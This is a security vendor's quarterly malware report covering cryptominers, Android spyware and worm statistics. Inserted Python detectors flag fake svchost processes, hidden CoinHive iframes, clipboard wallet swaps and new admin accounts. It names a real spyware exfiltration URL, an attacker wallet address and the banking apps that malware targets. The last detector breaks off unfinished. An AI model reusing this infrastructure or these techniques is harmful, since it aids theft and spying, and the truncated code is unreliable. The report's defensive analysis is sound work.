Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

The malicious code in the registry

This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to the cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature – it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task – mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svhost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess," meaning that terminating either of them will crash the system, leaving the user with a blue screen.
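A hunting check for the svchost.exe abuse described above, added here as an example (not Comodo's code). It encodes three invariants of the genuine Windows service host that a miner-launched or renamed copy tends to break: it is spawned by services.exe, it runs from System32 or SysWOW64, and it is started with a "-k <group>" argument. The process snapshot is constructed, not taken from a real infection, and the parent name dropper.exe is hypothetical.

```python
"""Hunt for svchost.exe impostors in a process snapshot (constructed data)."""
from dataclasses import dataclass
from typing import Dict, List

LEGIT_SVCHOST_PATHS = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\syswow64\svchost.exe",
}
LEGIT_SVCHOST_PARENT = "services.exe"


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    path: str
    cmdline: str


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; catches look-alike names such as svhost.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_suspicious_svchost(procs: List[Proc]) -> Dict[int, List[str]]:
    """Return {pid: [reasons]} for processes that claim to be svchost.exe but
    break an invariant, plus processes whose name merely resembles it."""
    by_pid = {p.pid: p for p in procs}
    findings: Dict[int, List[str]] = {}
    for p in procs:
        name = p.name.lower()
        reasons: List[str] = []
        if name == "svchost.exe":
            parent = by_pid.get(p.ppid)
            parent_name = parent.name.lower() if parent else "<unknown>"
            if parent_name != LEGIT_SVCHOST_PARENT:
                reasons.append(f"parent is {parent_name}, expected services.exe")
            if p.path.lower() not in LEGIT_SVCHOST_PATHS:
                reasons.append(f"unexpected image path {p.path}")
            if " -k " not in f" {p.cmdline} ":
                reasons.append("no -k service group on the command line")
        elif edit_distance(name, "svchost.exe") <= 2:
            reasons.append(f"look-alike process name {p.name}")
        if reasons:
            findings[p.pid] = reasons
    return findings


# Constructed snapshot: one healthy chain plus two miner-style impostors.
SAMPLE_SNAPSHOT = [
    Proc(500, 4, "wininit.exe", r"C:\Windows\System32\wininit.exe", "wininit.exe"),
    Proc(700, 500, "services.exe", r"C:\Windows\System32\services.exe", "services.exe"),
    Proc(900, 700, "svchost.exe", r"C:\Windows\System32\svchost.exe",
         "svchost.exe -k netsvcs -p"),
    # hypothetical installer that launched the two processes below
    Proc(3100, 2800, "dropper.exe", r"C:\Users\user\AppData\Local\Temp\dropper.exe",
         "dropper.exe"),
    # genuine binary, but launched by the dropper with no service group
    Proc(4200, 3100, "svchost.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe"),
    # renamed copy with a one-letter-off name (constructed)
    Proc(4300, 3100, "svhost.exe", r"C:\Users\user\AppData\Local\Temp\svhost.exe",
         "svhost.exe"),
]

if __name__ == "__main__":
    for pid, reasons in find_suspicious_svchost(SAMPLE_SNAPSHOT).items():
        print(pid, "; ".join(reasons))
```

Code already injected into a genuine, correctly parented svchost.exe will pass these checks; that case needs memory or network telemetry, and given the CriticalProcess flag the response is to remove the persistence and reboot rather than terminate the process.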

WinstarNssmMiner spreading around the world

Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows:

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.

The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way, CoinMiner undividedly occupies the victim's computer to use its resources for mining cryptocurrency.

Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing user detection. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking websites' code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.

As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe:

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we can find the familiar link to CoinHive.

The link to CoinHive

What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
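Detection logic for both forms of the embed described in this section, the plain CoinHive script tag and the camouflaged 1x1 iframe behind the cnhv.co shortener, added here as an example (not Comodo's or CoinHive's code). The two sample pages are constructed; the report does not say how the on-page string was encoded, so the scanner assumes a base64 blob passed to atob(), and the cnhv.co path in the sample is a placeholder.

```python
"""Scan page HTML for CoinHive embeds, plain or hidden in a decoded iframe."""
import base64
import re
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

# coinhive.com serves the miner script; cnhv.co is the CoinHive link shortener
# the report follows back to the miner.
MINER_HOSTS = {"coinhive.com", "cnhv.co"}
ATOB_BLOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")

Finding = Tuple[str, str]   # (rule that fired, offending URL)


def _host(url: str) -> str:
    return (urlparse(url or "").hostname or "").lower()


def _px(value) -> int:
    """Size attribute as pixels; a missing size means 'visible', not 'tiny'."""
    digits = re.sub(r"[^0-9]", "", value or "")
    return int(digits) if digits else 100


class MinerScanner(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Finding] = []
        self._script_text = None   # collects inline <script> bodies

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._script_text = ""
            if _host(a.get("src")) in MINER_HOSTS:
                self.findings.append(("script-src", a["src"]))
        elif tag == "iframe":
            src = a.get("src", "")
            if _host(src) in MINER_HOSTS:
                self.findings.append(("iframe-src", src))
            elif _px(a.get("width")) <= 1 and _px(a.get("height")) <= 1:
                # 1x1 frame to an unknown host: the camouflage described above
                self.findings.append(("tiny-iframe", src))

    def handle_data(self, data):
        if self._script_text is not None:
            self._script_text += data

    def handle_endtag(self, tag):
        if tag == "script" and self._script_text is not None:
            for blob in ATOB_BLOB_RE.findall(self._script_text):
                try:
                    decoded = base64.b64decode(blob).decode("utf-8", "replace")
                except ValueError:
                    continue
                # Re-scan whatever the page would have written at runtime
                for rule, url in scan_html(decoded):
                    self.findings.append(("decoded:" + rule, url))
            self._script_text = None


def scan_html(html: str) -> List[Finding]:
    scanner = MinerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample 1: the easily spotted embed from the first figure.
PLAIN_PAGE = (
    '<html><body><script src="https://coinhive.com/lib/coinhive.min.js">'
    '</script></body></html>'
)

# Constructed sample 2: nothing names a miner until the blob is decoded.
_HIDDEN_IFRAME = '<iframe src="https://cnhv.co/PLACEHOLDER" width="1" height="1"></iframe>'
CAMOUFLAGED_PAGE = (
    '<html><body><p>Welcome</p><script>document.write(atob("'
    + base64.b64encode(_HIDDEN_IFRAME.encode()).decode()
    + '"));</script></body></html>'
)

if __name__ == "__main__":
    print(scan_html(PLAIN_PAGE))
    print(scan_html(CAMOUFLAGED_PAGE))
```

The tiny-iframe rule fires on any 1x1 frame to a host outside the list, which is what lets the check survive a change of shortener; the shortener itself should still be resolved before blocking, as the report does with cnhv.co.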

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string combining different characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it changes it to the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers. But cybercriminals copied the program and added the malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.

An example of a clipboard hijacker attack
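A detection check for the swap shown above, added here as an example (not Comodo's code). The monitor is simulated: 'copy' events are what the user placed on the clipboard, 'poll' events are what a watcher later reads back, and no real clipboard is touched. The two Bitcoin addresses are the ones quoted in the report; every other value is constructed.

```python
"""Flag a clipboard wallet-address swap from a stream of clipboard events."""
import re
from typing import Iterable, List, Optional, Tuple

# Format-only patterns (no checksum): a well-formed replacement address must
# still be recognised, and recognition never needs a network lookup.
WALLET_PATTERNS = {
    "BTC-legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "BTC-bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{11,71}$"),
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def wallet_kind(text: str) -> Optional[str]:
    """Name the address family `text` looks like, or None."""
    text = text.strip()
    for kind, pattern in WALLET_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


def shared_prefix_len(a: str, b: str) -> int:
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def detect_swaps(events: Iterable[Tuple[str, str]]) -> List[dict]:
    """One alert per poll whose content is a wallet address the user did not
    copy. `events` is an ordered stream of ('copy' | 'poll', text)."""
    alerts: List[dict] = []
    last_copied: Optional[str] = None
    for kind, text in events:
        text = text.strip()
        if kind == "copy":
            last_copied = text
        elif kind == "poll":
            family = wallet_kind(text)
            if family and text != last_copied:
                alerts.append({
                    "expected": last_copied,
                    "observed": text,
                    "kind": family,
                    # a replacement may share leading characters so a glance at
                    # the start looks right; report how many match
                    "shared_prefix": shared_prefix_len(last_copied or "", text),
                })
    return alerts


# Constructed event stream: ordinary text, then the swap from the report.
SAMPLE_EVENTS = [
    ("copy", "meeting notes"),
    ("poll", "meeting notes"),
    ("copy", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),   # what the user copied
    ("poll", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),   # what the clipboard now holds
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_EVENTS):
        print(f"{alert['kind']} address replaced: "
              f"{alert['expected']} -> {alert['observed']}")
```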

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.

4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks

Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version-1: Naver Defender; Version-2: Netease Defender; Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details, contacts (id, name, phone numbers) and the email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the "AES" algorithm and sends it to the attackers' server http://http.cgalim.com/admin/hr/pu/pu.php?do=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. Also, it extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

Version-1: Dardesh (Google Play Services Instant Apps); Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.

4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups, انتخاب دھم; Version-2: Postrall, Yes For Referendum, انتخاب دھم; Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机; Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named "Spymaster Pro" and can:

• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the installed applications
• Collect browser data
• Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc. In addition to the abilities of previous versions, it includes some additional tricks:

• Extracts photos, audio and videos
• Records screen
• Executes shell commands
• Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

• Takes control over the Bluetooth adapter
• Extracts data about accounts, contact details and installed apps
• Extracts data from the WhatsApp message DB and related keys
• Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader

After infection, Xloader connects to its C&C server and executes the following commands:

• Extract the device information
• Delete SMS
• Set ringer mode
• Monitor incoming SMS messages
• Clear memory
• Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
• Extract contacts details
• Set Wi-Fi always turned on

Version 2 can execute additional commands:

• Send SMS and read outgoing SMS
• Enable and disable a Wi-Fi connection
• Access a location specified by attackers
• Make recordings
• Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.

App Distribution: FlexiSpy MBackup HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service Mobile Spy 随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license."

Version 1: Adobe Flash Player; Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

• Send_SMS – extract SMS content and send it to the C&C server
• Send_USSD – send the USSD to the C&C server
• Gethistory – monitor browser history
• Start_AllApp – gather info about installed applications
• Send_call – set the Intent action to call
• Forward_call – forward incoming calls
• ResForward_call – reset call forwarding
• Go_Smsmnd – delete SMS content
• Go_GetAlls – get SMS history
• Dell_sms – delete SMS content in a conversation
• Send_spam – send spam SMS
• Start_Inject – call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot:

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. Also, it checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

• contacts – get contact details and email id
• Mute – set action to mute
• Mms – get MMS content
• info – get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to get users' trust. It wears masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update WhatsApp, Viber; Version 2: Update Google Market, Flash Player, Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

• de.postbank.finanzassistent
• pl.mbank
• aib.ibank.android

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party play stores, social networks and messengers for spreading.

Version 1: CloudVPN MyIrancel Mtproto زیـــــبانـــــویس تلگرام ھمھ کاره Proxy دوست یاب Telegram Ton شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Noticeably, it's sold in three options: bronze, silver and gold.

After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run." But it runs in the background and starts the spying activity. It steals text messages and audio records, makes calls, detects device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option." If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises shown above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version-1: Netflix Hack, Instagram Hack; Version-2: TSF Launcher; Version-3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May

4.2.3 June 2018

Android-targeted malware in June

5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda, and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr), and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany, and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za), and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led the FBI to arrest 10 people for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans, and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem, or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected in Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI), and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb", for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction, and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user, and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
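As an added example (not Comodo's code) of how the behaviour reported above can be detected from host logs, the Python below correlates Windows Security event 4720 (user account created) with event 4732 (member added to a security-enabled local group) and alerts when a brand-new account lands in the Administrators group within a short window. The log lines are constructed samples in a simplified semicolon-separated form with placeholder host and account names, not real EVTX output.

```python
"""Detection logic for the account-creation behaviour reported above.

Added example, not Comodo's code. Windows records a local account creation as
Security event 4720 and a group membership change as event 4732; a fresh
account that is added to the Administrators group seconds after being created
is the pattern worth alerting on. The lines below are constructed samples in a
simplified semicolon-separated form (host and account names are placeholders),
not real EVTX output; a real 4732 carries the member as a SID, so this assumes
the log collector has already resolved it to an account name.
"""
from datetime import datetime, timedelta

# Constructed sample log: one fast create-then-elevate pair (the pattern),
# one slow pair a day apart (normal admin work), one non-admin group change.
SAMPLE_LOG = """\
2018-06-03T09:14:02;EventID=4720;Host=WS-PLACEHOLDER;TargetUser=Remote Service Account;Subject=alice
2018-06-03T09:14:05;EventID=4732;Host=WS-PLACEHOLDER;Group=Administrators;Member=Remote Service Account;Subject=alice
2018-06-03T11:30:00;EventID=4720;Host=WS-PLACEHOLDER;TargetUser=contractor01;Subject=helpdesk
2018-06-03T12:00:00;EventID=4732;Host=WS-PLACEHOLDER;Group=Remote Desktop Users;Member=bob;Subject=alice
2018-06-04T08:00:00;EventID=4732;Host=WS-PLACEHOLDER;Group=Administrators;Member=contractor01;Subject=helpdesk
"""

ADMIN_GROUPS = {"administrators"}   # local group names to watch (lower-case)
WINDOW = timedelta(minutes=10)      # creation-to-elevation gap treated as suspicious


def parse_line(line):
    """'<iso-time>;Key=Value;...' -> dict with a datetime under 'time'."""
    fields = line.strip().split(";")
    event = {"time": datetime.fromisoformat(fields[0])}
    for field in fields[1:]:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def parse_log(text):
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def find_new_admin_accounts(events, window=WINDOW, admin_groups=ADMIN_GROUPS):
    """Correlate a 4720 with a later 4732 into a watched group on the same host.

    Events are processed in time order; the creation time of every new account
    is remembered per (host, account) and matched when that account is added to
    an admin group within `window`.
    """
    created = {}
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev.get("EventID") == "4720":
            created[(ev["Host"], ev["TargetUser"].lower())] = ev["time"]
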